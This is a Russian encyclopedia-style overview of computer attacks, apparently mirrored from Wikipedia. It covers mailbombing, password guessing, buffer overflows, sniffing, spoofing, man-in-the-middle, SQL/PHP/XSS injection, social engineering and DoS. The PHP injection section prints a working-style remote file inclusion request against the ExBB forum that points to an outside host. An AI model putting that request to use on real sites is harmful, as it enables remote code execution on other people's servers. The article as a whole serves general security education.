Крэкерская атака

Крэкерская атака

Хакерская атака в узком смысле слова — в настоящее время под словосочетанием понимается «Покушение на систему безопасности», и склоняется скорее к смыслу следующего термина Крэкерская атака. Это произошло из-за искажения смысла самого слова «хакер».

Хакерская атака в широком смысле слова (изначальный смысл) — мозговой штурм, направленный на нахождение пути решения сложных задач. В хакерской атаке могут принимать участие один или несколько высококлассных специалистов (хакеров). В результате мозгового штурма могут быть придуманы нетрадиционные методы решения проблемы, или внесены оптимизирующие корректировки в уже существующие методы.

Крэкерская атака — действие, целью которого является захват контроля (повышение прав) над удалённой/локальной вычислительной системой, либо её дестабилизация, либо отказ в обслуживании.

Изначально причиной атак послужил ряд ограничений, присущих протоколу TCP/IP. В ранних версиях протокола IP отсутствовали требования безопасности, которые появились только спустя несколько лет. Но только с бурным развитием интернет-коммерции проблема стала актуальной, и пришлось в сжатые сроки внедрять стандарты безопасности.

Содержание

Mailbombing

Считается самым старым методом атак, хотя суть его проста и примитивна: большое количество почтовых сообщений делают невозможными работу с почтовыми ящиками, а иногда и с целыми почтовыми серверами. Для этой цели было разработано множество программ, и даже неопытный пользователь мог совершить атаку, указав всего лишь e-mail жертвы, текст сообщения, и количество необходимых сообщений. Многие такие программы позволяли прятать реальный IP-адрес отправителя, используя для рассылки анонимный почтовый сервер. Эту атаку легко предотвратить, так как большинство провайдеров имеют хорошие фильтры защиты от рассылки спама. Провайдер может ограничить количество писем от одного отправителя, и такая атака становится неэффективной.

Подбор пароля

Следующий вид атаки тоже прост. Взломщик подбирает пароли к системам ограничения доступа. Ведь вполне очевидно, что пользователи вычислительных систем обычно не в состоянии держать в уме комбинации из букв, цифр и знаков длиной до ста символов. Среднестатистический пароль для доступа к системе обычно не превышает восьми символов, а иногда в качестве пароля вообще используется слово или дата.

При использовании даты всё просто, так как восемь цифр — это всего лишь 108=100 000 000 возможных комбинаций, причём либо первые либо последние 4 цифры обозначают год, и находятся где-то в промежутке между 1900 и 2050. Две другие цифры обозначают месяц, то есть принимают значения от 1 до 12. Оставшиеся цифры принимают значения от 1 до 31 — дни месяца. Здесь же можно исключить даты типа 3102 (31 февраля), так как такие даты используются крайне редко. При отсутствии защиты от перебора паролей подобрать кодовую дату для средней программы не составит труда: при переборе около 100 паролей в секунду (не проблема даже для медленного компьютера) это займет чуть больше одиннадцати суток.

Для фраз всё несколько сложнее, так как если даже взять английский алфавит из 26 букв (русский — 33 буквы), то фраза из восьми символов будет состоять уже из 268=208 827 064 576 вариантов (338=1 406 408 618 241 вариантов для русского языка), что уже в тысячи раз сложнее. Но тут на помощь приходит смекалка: вряд ли пользователь будет запоминать случайные последовательности символов, то есть достаточно перебрать всего лишь все существующие слова в английском словаре, которых там наберется не более 200 000, включая жаргон и редкие слова, а это уже в миллион раз проще. Кроме того, если начать думать ещё внимательнее — большинство горожан, да к тому же работающих в определенной сфере, имеют гораздо меньше слов в своем лексиконе, что снижает количество возможных вариантов ещё на порядок. Также можно принять во внимание, что в качестве паролей могут использоваться имена родственников, домашних животных, названия городов.

Тем не менее, нет никаких оснований рассчитывать на столь лёгкий способ получения пароля. В настоящее время большинство пользователей (и тем более системные администраторы коммерческих компаний) используют в качестве пароля случайные последовательности из больших и маленьких латинских символов вперемежку с цифрами. Существует несколько способов создания (и запоминания) надёжного пароля. Например, из первых букв фразы «у лукоморья дуб зелёный, златая цепь на дубе том» получается 9-буквенный пароль улдззцндт, на подбор которого уйдет несколько триллионов попыток.

Переполнение буфера

Пожалуй один из самых распространенных типов атак в Интернете. Принцип данной атаки построен на использовании программных ошибок, позволяющих вызвать нарушение границ памяти и аварийно завершить приложение или выполнить произвольный бинарный код от имени пользователя под которым работала уязвимая программа. Если программа работает под учетной записью администратора системы, то данная атака позволит получить полный контроль над компьютером жертвы, поэтому рекомендуется работать под учетной записью рядового пользователя имеющего ограниченные права на системе, а под учетной записью администратора системы выполнять только операции требующие административные права.

Вирусы, троянские кони, почтовые черви, снифферы,

Следующий вид атаки представляет собой более изощренный метод получения доступа к закрытой информации — это использование специальных программ для ведения работы на компьютере жертвы. Такие программы предназначены для поиска и передачи своему владельцу секретной информации, либо просто для нанесения вреда системе безопасности и работоспособности компьютера жертвы. Принципы действия этих программ различны, поэтому мы не будем рассматривать их в этой статье.

Сетевая разведка

В ходе такой атаки кракер собственно не производит никаких деструктивных действий, но в результате он может получить закрытую информацию о построении и принципах функционирования вычислительной системы жертвы. Полученная информация может быть использована для грамотного построения предстоящей атаки, и обычно производится на подготовительных этапах.

В ходе такой разведки злоумышленник может производить сканирование портов, запросы прокси-серверов. В результате можно получить информацию о существующих в системе DNS-адресах, кому они принадлежат, какие сервисы на них доступны, уровень доступа к этим сервисам для внешних и внутренних пользователей.

Сниффинг пакетов

Также довольно распространенный вид атаки, основанный на работе сетевой карты в режиме promiscuous mode, а также monitor mode для сетей сниффером, для обработки. В результате злоумышленник может получить большое количество служебной информации: кто откуда куда передавал пакеты, через какие адреса эти пакеты проходили. Самой большой опасностью такой атаки является получение самой информации, например логинов и паролей сотрудников, которые можно использовать для незаконного проникновения в систему под видом обычного сотрудника компании.

IP-спуфинг

Тоже распространенный вид атаки в недостаточно защищённых сетях, когда злоумышленник выдает себя за санкционированного пользователя, находясь в самой организации, или за её пределами. Для этого кракеру необходимо воспользоваться IP-адресом, разрешённым в системе безопасности сети. Такая атака возможна, если система безопасности позволяет идентификацию пользователя только по IP-адресу и не требует дополнительных подтверждений .

Man-in-the-Middle

англ. «Человек посередине». Вид атаки, когда злоумышленник перехватывает канал связи между двумя системами, и получает доступ ко всей передаваемой информации. При получении доступа на таком уровне крякер может модифицировать информацию нужным ему образом, чтобы достичь своих целей. Цель такой атаки — кража или фальсифицирование передаваемой информации, или же получение доступа к ресурсам сети. Такие атаки крайне сложно отследить, так как обычно злоумышленник находится внутри организации.

Инъекция

Атака, связанная с различного рода инъекциями, подразумевает внедрение сторонних команд или данных в работающую систему с целью изменения хода работы системы, а в результате — получение доступа к закрытым функциям и информации, либо дестабилизации работы системы в целом. Наиболее популярна такая атака в сети Интернет, но также может быть проведена через командную строку системы.

SQL-инъекция — атака, в ходе которой изменяются параметры URL) для построения SQL-запросов к базам данных без соответствующей проверки.

PHP-инъекция — один из способов взлома веб-сайтов, работающих на веб-приложения на серверной стороне сайта, что приводит к выполнению произвольных команд. Известно, что во многих распространённых в интернете бесплатных движках и форумах, работающих на PHP (чаще всего это устаревшие версии) есть непродуманные модули или отдельные конструкции с уязвимостями. Крэкеры анализируют такие уязвимости , как неэкранированные переменные, получающие внешние значения, например старая уязвимость форума ExBB используется хакерами запросом: GET //modules/threadstop/threadstop.php?new_exbb[home_path]=evilhackerscorp.com/tx.txt????? .

Межсайтовый скриптинг или XSS (аббр. от англ. Cross Site Scripting) — тип уязвимостей, обычно обнаруживаемых в веб-приложениях, которые позволяют внедрять код злонамеренным пользователям в веб-страницы, просматриваемые другими пользователями. Примерами такого кода являются JavaScript. Другие названия: CSS, реже — скрипт-инъекция.

XPath-инъекция - вид уязвимостей, который заключается во внедрении XML. Как и при остальных видах инъекций, уязвимость возможна ввиду недостаточной проверки входных данных.

См. также

Социальная инженерия

Социальная инженерия (от англ. Social Engineering) — использование некомпетентности, непрофессионализма или небрежности персонала для получения доступа к информации. Этот метод обычно применяется без компьютера, с использованием обычного телефона, почтовой переписки либо кружечки пива. Таким образом обычно получается самая разнообразная информация. В ходе такой атаки злоумышленник устанавливает контакт с жертвой, и, вводя её в заблуждение либо войдя в доверие, пытается получить необходимые сведения, которые сложно получить другим путём, либо другие пути являются более рискованными. Как гласит старая поговорка, «Самое слабое звено системы безопасности — Человек».

Отказ в обслуживании

DoS (от англ. Denial of Service — Отказ в обслуживании) — атака, имеющая своей целью заставить сервер не отвечать на запросы. Такой вид атаки не подразумевает получение некоторой секретной информации, но иногда бывает подспорьем в инициализации других атак. Например, некоторые программы из-за ошибок в своем коде могут вызывать исключительные ситуации, и при отключении сервисов способны исполнять код, предоставленный злоумышленником или атаки лавинного типа, когда сервер не может обработать огромное количество входящих пакетов.

DDoS (от англ. Distributed Denial of Service — Распределенная DoS) — подтип DoS атаки, имеющий ту же цель что и DoS, но производимой не с одного компьютера, а с нескольких компьютеров в сети. В данных типах атак используется либо возникновение ошибок, приводящих к отказу сервиса, либо срабатывание защиты, приводящей к блокированию работы сервиса, а в результате также к отказу в обслуживании. DDoS используется там, где обычный DoS неэффективен. Для этого несколько компьютеров объединяются, и каждый производит DoS атаку на систему жертвы. Вместе это называется DDoS-атака.

Любая атака представляет собой не что иное, как попытку использовать несовершенство системы безопасности жертвы либо для получения информации, либо для нанесения вреда системе, поэтому причиной любой удачной атаки является профессионализм крякера и ценность информации, а так же недостаточная компетенция администратора системы безопасности в частности, несовершенство программного обеспечения, и недостаточное внимание к вопросам безопасности в компании в принципе.

См. также

Ссылки



Wikimedia Foundation. 2010.

Игры ⚽ Нужно решить контрольную?

Полезное


Смотреть что такое "Крэкерская атака" в других словарях:

  • Хакерская атака — в узком смысле слова в настоящее время под словосочетанием понимается «Покушение на систему безопасности», и склоняется скорее к смыслу следующего термина Крэкерская атака. Это произошло из за искажения смысла самого слова «хакер». Хакерская… …   Википедия

  • Взломщик (компьютер) — Эмблема хакеров Хакер (от англ. hack)  особый тип компьютерных специалистов. Иногда этот термин применяют для обозначения специалистов вообще  в том контексте, что они обладают очень детальными знаниями в каких либо вопросах, или имеют достаточно …   Википедия

  • Хакинг — Эмблема хакеров Хакер (от англ. hack)  особый тип компьютерных специалистов. Иногда этот термин применяют для обозначения специалистов вообще  в том контексте, что они обладают очень детальными знаниями в каких либо вопросах, или имеют достаточно …   Википедия

  • Хэкер — Эмблема хакеров Хакер (от англ. hack)  особый тип компьютерных специалистов. Иногда этот термин применяют для обозначения специалистов вообще  в том контексте, что они обладают очень детальными знаниями в каких либо вопросах, или имеют достаточно …   Википедия


Поделиться ссылкой на выделенное

Прямая ссылка:
Нажмите правой клавишей мыши и выберите «Копировать ссылку»